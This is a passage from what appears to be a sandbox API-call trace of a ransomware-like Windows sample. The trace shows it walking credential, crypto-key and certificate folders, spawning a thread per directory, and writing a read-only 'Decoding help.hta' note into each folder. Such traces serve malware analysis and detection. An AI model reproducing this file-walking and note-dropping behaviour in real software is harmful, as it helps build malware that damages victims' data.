pbData=0x166dfbe4*, pdwDataLen=0x166dfce4*=0x2c) returned 1 [0060.241] MapViewOfFile (hFileMappingObject=0xd5c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1c0) returned 0x8790000 Thread: id = 781 os_tid = 0xa84 [0054.507] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Credentials\\*.*", lpFindFileData=0xd38fd30 | out: lpFindFileData=0xd38fd30*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xea43994d, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e2e30 [0057.472] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0057.472] FindNextFileW (in: hFindFile=0x5e2e30, lpFindFileData=0xd38fd30 | out: lpFindFileData=0xd38fd30*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xea43994d, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0057.472] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0057.472] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0057.472] FindNextFileW (in: hFindFile=0x5e2e30, lpFindFileData=0xd38fd30 | out: lpFindFileData=0xd38fd30*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xea43994d, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0057.472] FindClose (in: hFindFile=0x5e2e30 | out: hFindFile=0x5e2e30) returned 1 Thread: id = 782 os_tid = 0xa88 [0054.508] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\*.*", lpFindFileData=0xd8cfd30 | out: lpFindFileData=0xd8cfd30*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x160a67d7, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5db5f8 [0058.870] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0058.870] FindNextFileW (in: hFindFile=0x5db5f8, lpFindFileData=0xd8cfd30 | out: lpFindFileData=0xd8cfd30*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x160a67d7, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.870] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0058.870] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0058.870] FindNextFileW (in: hFindFile=0x5db5f8, lpFindFileData=0xd8cfd30 | out: lpFindFileData=0xd8cfd30*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x5af83960, ftLastWriteTime.dwHighDateTime=0x1cb8930, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RSA", cAlternateFileName="")) returned 1 [0058.870] lstrcmpW (lpString1=".", lpString2="RSA") returned -1 [0058.870] lstrcmpW (lpString1="..", lpString2="RSA") returned -1 [0058.871] lstrcmpiW (lpString1="windows", lpString2="RSA") returned 1 [0058.871] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\*.*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\*.*" [0058.871] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\*.*") returned 57 [0058.871] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\", lpString2="RSA" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\RSA") returned="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\RSA" [0058.871] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\RSA", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\*.*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\*.*" [0058.871] GlobalMemoryStatus (in: lpBuffer=0xd8cfd10 | out: lpBuffer=0xd8cfd10) [0058.871] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x246f54d8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x8a8 [0058.872] CloseHandle (hObject=0x8a8) returned 1 [0058.872] FindNextFileW (in: hFindFile=0x5db5f8, lpFindFileData=0xd8cfd30 | out: lpFindFileData=0xd8cfd30*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x5af83960, ftLastWriteTime.dwHighDateTime=0x1cb8930, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RSA", cAlternateFileName="")) returned 0 [0058.872] FindClose (in: hFindFile=0x5db5f8 | out: hFindFile=0x5db5f8) returned 1 Thread: id = 783 os_tid = 0xa8c [0054.508] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\*.*", lpFindFileData=0x19c1fd30 | out: lpFindFileData=0x19c1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfda27f60, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfda27f60, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5db5f8 [0058.874] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0058.874] FindNextFileW (in: hFindFile=0x5db5f8, lpFindFileData=0x19c1fd30 | out: lpFindFileData=0x19c1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfda27f60, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfda27f60, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.874] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0058.874] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0058.874] FindNextFileW (in: hFindFile=0x5db5f8, lpFindFileData=0x19c1fd30 | out: lpFindFileData=0x19c1fd30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6451100, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf96dfdac, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Quick Launch", cAlternateFileName="QUICKL~1")) returned 1 [0058.874] lstrcmpW (lpString1=".", lpString2="Quick Launch") returned -1 [0058.874] lstrcmpW (lpString1="..", lpString2="Quick Launch") returned -1 [0058.875] lstrcmpiW (lpString1="windows", lpString2="Quick Launch") returned 1 [0058.875] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\*.*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\*.*" [0058.875] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\*.*") returned 68 [0058.875] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\", lpString2="Quick Launch" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch") returned="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch" [0058.875] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\*.*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\*.*" [0058.875] GlobalMemoryStatus (in: lpBuffer=0x19c1fd10 | out: lpBuffer=0x19c1fd10) [0058.875] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10c9e868, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x8a8 [0058.876] CloseHandle (hObject=0x8a8) returned 1 [0058.876] FindNextFileW (in: hFindFile=0x5db5f8, lpFindFileData=0x19c1fd30 | out: lpFindFileData=0x19c1fd30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6451100, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf96dfdac, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Quick Launch", cAlternateFileName="QUICKL~1")) returned 0 [0058.876] FindClose (in: hFindFile=0x5db5f8 | out: hFindFile=0x5db5f8) returned 1 Thread: id = 784 os_tid = 0x918 [0054.508] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\*.*", lpFindFileData=0x217cfd30 | out: lpFindFileData=0x217cfd30*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x642afa0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf29f8e64, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x10fbc598 [0058.879] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0058.879] FindNextFileW (in: hFindFile=0x10fbc598, lpFindFileData=0x217cfd30 | out: lpFindFileData=0x217cfd30*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x642afa0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf29f8e64, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.879] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0058.879] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0058.879] FindNextFileW (in: hFindFile=0x10fbc598, lpFindFileData=0x217cfd30 | out: lpFindFileData=0x217cfd30*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x642afa0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x642afa0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf29f8e64, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x18, dwReserved0=0x0, dwReserved1=0x0, cFileName="CREDHIST", cAlternateFileName="")) returned 1 [0058.879] lstrcpyW (in: lpString1=0x110fba10, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\*.*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\*.*" [0058.879] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\*.*") returned 58 [0058.879] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\Decoding help.hta") returned="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\Decoding help.hta" [0058.879] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\Decoding help.hta" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\protect\\decoding help.hta")) returned 0xffffffff [0058.880] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\Decoding help.hta" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\protect\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x260 [0060.492] WriteFile (in: hFile=0x260, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x217cfcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x217cfcf8*=0x78e, lpOverlapped=0x0) returned 1 [0061.592] CloseHandle (hObject=0x260) returned 1 [0061.592] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\Decoding help.hta", dwFileAttributes=0x1) returned 1 Thread: id = 785 os_tid = 0xa80 [0054.509] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\*.*", lpFindFileData=0x218cfd30 | out: lpFindFileData=0x218cfd30*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x96779c3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x10fbc5d8 [0058.880] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0058.880] FindNextFileW (in: hFindFile=0x10fbc5d8, lpFindFileData=0x218cfd30 | out: lpFindFileData=0x218cfd30*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x96779c3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.880] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0058.880] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0058.880] FindNextFileW (in: hFindFile=0x10fbc5d8, lpFindFileData=0x218cfd30 | out: lpFindFileData=0x218cfd30*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x96779c3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="My", cAlternateFileName="")) returned 1 [0058.880] lstrcmpW (lpString1=".", lpString2="My") returned -1 [0058.880] lstrcmpW (lpString1="..", lpString2="My") returned -1 [0058.880] lstrcmpiW (lpString1="windows", lpString2="My") returned 1 [0058.881] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\*.*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\*.*" [0058.881] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\*.*") returned 69 [0058.881] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\", lpString2="My" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My") returned="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My" [0058.881] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\*.*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\*.*" [0058.881] GlobalMemoryStatus (in: lpBuffer=0x218cfd10 | out: lpBuffer=0x218cfd10) [0058.881] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10dced58, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x828 [0058.882] CloseHandle (hObject=0x828) returned 1 [0058.882] FindNextFileW (in: hFindFile=0x10fbc5d8, lpFindFileData=0x218cfd30 | out: lpFindFileData=0x218cfd30*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x96779c3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="My", cAlternateFileName="")) returned 0 [0058.882] FindClose (in: hFindFile=0x10fbc5d8 | out: hFindFile=0x10fbc5d8) returned 1 Thread: id = 786 os_tid = 0x95c [0054.509] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\*.*", lpFindFileData=0x21b4fd30 | out: lpFindFileData=0x21b4fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf2c805c8, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6718b0 [0054.509] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0054.510] FindNextFileW (in: hFindFile=0x6718b0, lpFindFileData=0x21b4fd30 | out: lpFindFileData=0x21b4fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf2c805c8, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0054.510] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0054.510] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0054.510] FindNextFileW (in: hFindFile=0x6718b0, lpFindFileData=0x21b4fd30 | out: lpFindFileData=0x21b4fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf2c805c8, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0054.510] FindClose (in: hFindFile=0x6718b0 | out: hFindFile=0x6718b0) returned 1 Thread: id = 787 os_tid = 0x534 [0054.510] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\*.*", lpFindFileData=0x21ecfd30 | out: lpFindFileData=0x21ecfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf94d4300, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0xf94d4300, ftLastAccessTime.dwHighDateTime=0x1d2fc27, ftLastWriteTime.dwLowDateTime=0x2a2d75f0, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5db2b8 [0056.937] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0056.937] FindNextFileW (in: hFindFile=0x5db2b8, lpFindFileData=0x21ecfd30 | out: lpFindFileData=0x21ecfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf94d4300, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0xf94d4300, ftLastAccessTime.dwHighDateTime=0x1d2fc27, ftLastWriteTime.dwLowDateTime=0x2a2d75f0, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.937] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0056.937] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0056.937] FindNextFileW (in: hFindFile=0x5db2b8, lpFindFileData=0x21ecfd30 | out: lpFindFileData=0x21ecfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd15e8b00, ftCreationTime.dwHighDateTime=0x1d28824, ftLastAccessTime.dwLowDateTime=0xd15e8b00, ftLastAccessTime.dwHighDateTime=0x1d28824, ftLastWriteTime.dwLowDateTime=0xd15e8b00, ftLastWriteTime.dwHighDateTime=0x1d28824, nFileSizeHigh=0x0, nFileSizeLow=0x13babb, dwReserved0=0x0, dwReserved1=0x0, cFileName="cab1.cab", cAlternateFileName="")) returned 1 [0056.938] lstrcpyW (in: lpString1=0x244e8190, lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\*.*" [0056.938] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\*.*") returned 121 [0056.938] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\Decoding help.hta") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\Decoding help.hta" [0056.938] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\Decoding help.hta" (normalized: "c:\\users\\all users\\package cache\\{582ea838-9199-3518-a05c-db09462f68ec}v14.10.25017\\packages\\vcruntimeminimum_x86\\decoding help.hta")) returned 0x20 [0056.938] lstrcmpiW (lpString1="Decoding help.hta", lpString2="cab1.cab") returned 1 [0056.938] lstrlenW (lpString="cab1.cab") returned 8 [0056.938] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\*.*" [0056.938] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\*.*") returned 121 [0056.938] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\", lpString2="cab1.cab" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\cab1.cab") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\cab1.cab" [0056.938] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\cab1.cab" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\cab1.cab") returned="\\\\?\\C:\\Users\\All Users\\Package 